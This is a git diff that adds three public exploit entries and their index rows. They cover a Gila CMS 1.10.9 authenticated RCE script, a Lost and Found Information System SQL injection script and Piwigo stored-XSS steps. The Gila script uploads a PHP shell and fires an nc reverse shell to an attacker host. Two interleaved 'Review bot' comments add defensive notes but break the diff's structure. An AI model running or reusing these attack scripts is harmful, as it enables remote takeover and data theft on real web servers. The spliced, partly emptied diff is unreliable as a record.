diff --git a/exploits/php/webapps/51569.py b/exploits/php/webapps/51569.py
new file mode 100755
index 0000000000..3a4d23cccb
--- /dev/null
+++ b/exploits/php/webapps/51569.py
@@ -0,0 +1,100 @@
+# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
+# Date: 05-07-2023
+# Exploit Author: Omer Shaik (unknown_exploit)
+# Vendor Homepage: https://gilacms.com/
+# Software Link: https://github.com/GilaCMS/gila/
+# Version: Gila 1.10.9
+# Tested on: Linux
+
+import requests
+from termcolor import colored
+from urllib.parse import urlparse
+
+# Print ASCII art
+ascii_art = """
+ ██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
+██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
+██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
+██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
+╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
+ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
+
+ by Unknown_Exploit
+"""
+
+print(colored(ascii_art, "green"))
+
+# Prompt user for target URL
+target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")
+
+# Extract domain from target URL
+parsed_url = urlparse(target_url)
+domain = parsed_url.netloc
+target_url_2 = f"http://{domain}/"
+
+# Prompt user for login credentials
+username = input("Enter the email: ")
+password = input("Enter the password: ")
+
+# Create a session and perform login
+session = requests.Session()
+login_payload = {
+ 'action': 'login',
+ 'username': username,
+ 'password': password
+}
+response = session.post(target_url, data=login_payload)
+cookie = response.cookies.get_dict()
+var1 = cookie['PHPSESSID']
+var2 = cookie['GSESSIONID']
+
+# Prompt user for local IP and port
+lhost = input("Enter the local IP (LHOST): ")
+lport = input("Enter the local port (LPORT): ")
+
+# Construct the payload
+payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
+payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"
+
+# Perform file upload using POST request
+upload_url = f"{target_url_2}fm/upload"
+upload_headers = {
+ "Host": domain,
+ "Content-Length": "424",
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
+ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
+ "Accept": "*/*",
+ "Origin": target_url_2,
+ "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
+ "Accept-Encoding": "gzip, deflate",
+ "Accept-Language": "en-US,en;q=0.9",
+ "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
+ "Connection": "close"
+}
+upload_data = f'''
+------WebKitFormBoundarynKy5BIIJQcZC80i2
+Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
+Content-Type: application/x-php
+
+
+
+------WebKitFormBoundarynKy5BIIJQcZC80i2
+Content-Disposition: form-data; name="path"
+
+tmp
+------WebKitFormBoundarynKy5BIIJQcZC80i2
+Content-Disposition: form-data; name="g_response"
+
+content
+------WebKitFormBoundarynKy5BIIJQcZC80i2--
+'''
+
+upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)
+
+if upload_response.status_code == 200:
+ print("File uploaded successfully.")
+ # Execute payload
+ response = session.get(payload_url)
+ print("Payload executed successfully.")
+else:
+ print("Error uploading the file:", upload_response.text)
\ No newline at end of file
diff --git a/exploits/php/webapps/51570.py b/exploits/php/webapps/51570.py
new file mode 100755
index 0000000000..5b51ff3a33
--- /dev/null
+++ b/exploits/php/webapps/51570.py
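Review bot: The header block of 51569.py (through `# Tested on: Linux`) gives no CVE or advisory reference, no fixed version and no statement of the root cause, so a defender has to reconstruct the flaw from the request sequence. From the visible lines it appears to be an authenticated POST to `fm/upload` that stores `shell.php7` under a web-served `tmp/` path, followed by a GET to `tmp/shell.php7` with a `cmd` parameter; I would add header comments along the lines of `# Root cause (inferred): file manager upload accepts a PHP-family extension into web-reachable tmp/` and `# Mitigation: allow-list upload extensions; disable script execution under tmp/`. That same request pair, plus the outbound connection it leads to, is what detection should key on in web and egress logs. The `Referer` value points at `tmp/.htaccess`, which suggests the result depends on that file's state; that precondition is not documented either.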
@@ -0,0 +1,24 @@
+# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
+# Date: 2023-06-30
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : webapps
+# Dork : /php-lfis/admin/?page=system_info/contact_information
+# Tested on: Windows/Linux
+# CVE : CVE-2023-33592
+import requests
+
+# URL of the vulnerable component
+url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"
+
+# Injecting a SQL query to exploit the vulnerability
+payload = "' OR 1=1 -- "
+
+# Send the request with the injected payload
+response = requests.get(url + payload)
+
+# Check if the SQL injection was successful
+if "admin" in response.text:
+ print("SQL injection successful!")
+else:
+ print("SQL injection failed.")
\ No newline at end of file
diff --git a/exploits/php/webapps/51572.txt b/exploits/php/webapps/51572.txt
new file mode 100644
index 0000000000..c2d695ca5d
--- /dev/null
+++ b/exploits/php/webapps/51572.txt
@@ -0,0 +1,15 @@
+#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
+#Date: 25 June 2023
+#Exploit Author: Okan Kurtulus
+#Vendor Homepage: https://piwigo.org
+#Version: 13.7.0
+#Tested on: Ubuntu 22.04
+#CVE : N/A
+
+# Proof of Concept:
+1– Install the system through the website and log in with any user authorized to upload photos.
+2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.
+3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.
+
+#Payload
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bdcc933bbd..7c8702a399 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
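Review bot: The final check `if "admin" in response.text:` in 51570.py cannot distinguish a vulnerable host from a patched one, since the request targets a page under `/php-lfis/admin/` whose markup plausibly contains that word either way, so the script is not usable as a verification for CVE-2023-33592. The header also never names the affected parameter; the payload is simply appended to the URL and so lands in the `page` value. I would document both in place, e.g. `# NOTE: the "admin" substring match is not evidence of injection; see the CVE-2023-33592 advisory for the affected parameter`. On the application side the fix to verify is that the value reaching the query is bound as a parameter or matched against an allow-list of page names.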
@@ -19046,6 +19046,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,, 44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,, 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80,2019-07-29,2019-07-29,0,,"Cross-Site Scripting (XSS)",,,, +51569,exploits/php/webapps/51569.py,"Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)",2023-07-06,"Omer Shaik",webapps,php,,2023-07-06,2023-07-06,0,,,,,, 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,,2020-06-16,2020-06-16,0,CVE-2020-5515,,,,, 46557,exploits/php/webapps/46557.txt,"Gila CMS 1.9.1 - Cross-Site Scripting",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-19,2019-03-19,0,CVE-2019-9647,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.com1.9.1.zip, 49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,,2021-01-12,2021-01-12,1,,,,,, 
@@ -22573,6 +22574,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,webapps,php,,2008-02-13,2016-11-14,1,OSVDB-41835;CVE-2008-0803;OSVDB-41834;OSVDB-41833;OSVDB-41832;OSVDB-41831;OSVDB-41830;OSVDB-41829;OSVDB-41828;OSVDB-41827;OSVDB-41826;OSVDB-41825;OSVDB-41824;OSVDB-41823;OSVDB-41822;OSVDB-41821;OSVDB-41820;OSVDB-41819;OSVDB-41818;OSVDB-41817;OSVDB-41816;OSVDB-41815;OSVDB-41814;OSVDB-41813;OSVDB-41812;OSVDB-41811;OSVDB-41810;OSVDB-41809;OSVDB-41808,,,,http://www.exploit-db.comlookstrike-v0.9.zip, 26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,webapps,php,,2005-12-01,2013-07-08,1,CVE-2005-3988;OSVDB-21328,,,,,https://www.securityfocus.com/bid/15665/info 7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php,,2009-01-27,,1,,,,,, +51570,exploits/php/webapps/51570.py,"Lost and Found Information System v1.0 - SQL Injection",2023-07-06,"Amirhossein Bahramizadeh",webapps,php,,2023-07-06,2023-07-06,0,CVE-2023-33592,,,,, 48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-11-05,1,,,,,, 48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-10-23,0,,,,,, 4710,exploits/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",webapps,php,,2007-12-09,,1,OSVDB-52880;OSVDB-52879;OSVDB-52877,,,,, 
@@ -27604,6 +27606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42098,exploits/php/webapps/42098.txt,"Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting",2017-05-31,"Touhid M.Shaikh",webapps,php,,2017-05-31,2017-05-31,0,,,,,http://www.exploit-db.compiwigo-facetag_0.0.3.zip, 42094,exploits/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",webapps,php,,2017-05-31,2017-05-31,0,,,,,http://www.exploit-db.compiwigo-facetag_0.0.3.zip, 42443,exploits/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",webapps,php,,2017-08-10,2017-08-10,0,,,,,http://www.exploit-db.comuser_tags-0.9.0.zip, +51572,exploits/php/webapps/51572.txt,"Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-07-06,"Okan Kurtulus",webapps,php,,2023-07-06,2023-07-06,0,,,,,, 14973,exploits/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,webapps,php,,2010-09-11,2010-09-12,1,OSVDB-67968,,,,http://www.exploit-db.compiwigo-2.1.2.zip, 33814,exploits/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Cross-Site Scripting",2010-03-31,garwga,webapps,php,,2010-03-31,2014-06-19,1,CVE-2010-1453;OSVDB-64359,,,,,https://www.securityfocus.com/bid/39144/info 9962,exploits/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,webapps,php,,2009-10-18,,1,,,,,,